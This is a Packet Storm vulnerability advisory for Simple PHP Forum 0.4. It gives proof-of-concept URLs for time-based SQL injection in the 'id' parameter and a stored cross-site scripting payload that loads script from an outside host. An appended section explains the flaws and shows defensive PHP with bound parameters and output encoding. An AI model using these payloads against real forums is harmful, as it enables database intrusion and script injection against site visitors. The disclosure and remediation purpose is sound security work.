Sphpforum 0.4 Cross Site Scripting / SQL Injection

2012-08-16T00:00:00
ID PACKETSTORM:115591
Type packetstorm
Reporter loneferret
Modified 2012-08-16T00:00:00

Description

                                        
                                            `# Author: loneferret of Offensive Security  
# Product: sphpforum  
# Version: 0.4 (older versions may be affected)  
#  
# Software Download: http://sourceforge.net/projects/sphpforum/  
  
# Description:  
# Simple PHP Forum is a PHP based forum/BBS board is designed to be small, simple,  
# fast and allow easy integration into any existing web site.  
  
# Vulnerability:  
# Due to improper input sanitation, parameters are prone to SQL injection. Stored  
# crossed site scripting is also present in some forms.  
  
# PoC 1:  
# SQL Injection  
# Page: view_topic.php / view_profile.php?  
# Vulnerable param: 'id'  
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271  
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271  
  
# PoC 2:  
# Stored XSS  
# Page: create_topic.php  
# Vulnerable field: Topic  
# Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>  
  
`
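The two defects the advisory reports both come from untrusted request values reaching SQL and HTML unencoded. The following is an added illustration, not sphpforum's own code: it reconstructs the concatenation pattern behind PoC 1 and shows the hardened handling with PDO bound parameters and output encoding for the stored topic title (PoC 2). Table and column names, and the function names, are assumptions.

```php
<?php
// Added illustrative example, not code from sphpforum. Table/column
// names and function names are assumptions for demonstration only.
declare(strict_types=1);

// --- Vulnerable pattern (PoC 1): the raw 'id' value is spliced into the
// SQL text, so a time-based payload such as "50' and sleep(10) and '1'='1"
// becomes part of the statement and the database evaluates it.
function topicQueryUnsafe(string $id): string
{
    return "SELECT * FROM topics WHERE id = '" . $id . "'";
}

// --- Hardened view_topic.php lookup: the id is numeric, so reject anything
// else up front and bind it as an integer; the value never becomes SQL text.
function fetchTopic(PDO $db, string $id): ?array
{
    if (!ctype_digit($id)) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, title, body FROM topics WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Hardened view_profile.php lookup: the id is a username (a string),
// so it cannot be cast, but a bound parameter still keeps it out of the
// statement; a quote or sleep() inside it is only compared as data.
function fetchProfile(PDO $db, string $user): ?array
{
    $stmt = $db->prepare('SELECT username, signature FROM users WHERE username = :u');
    $stmt->bindValue(':u', $user, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Stored XSS (PoC 2): encode the stored Topic title on every render so
// a <SCRIPT> tag saved via create_topic.php is shown as text, not executed.
function renderTopicTitle(string $title): string
{
    return htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage: the advisory's stored-XSS payload becomes inert markup text.
echo renderTopicTitle('<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'), "\n";
```

Encoding at output time (rather than only stripping tags on input) is what prevents the stored payload from running, because the same title is rendered in more than one page.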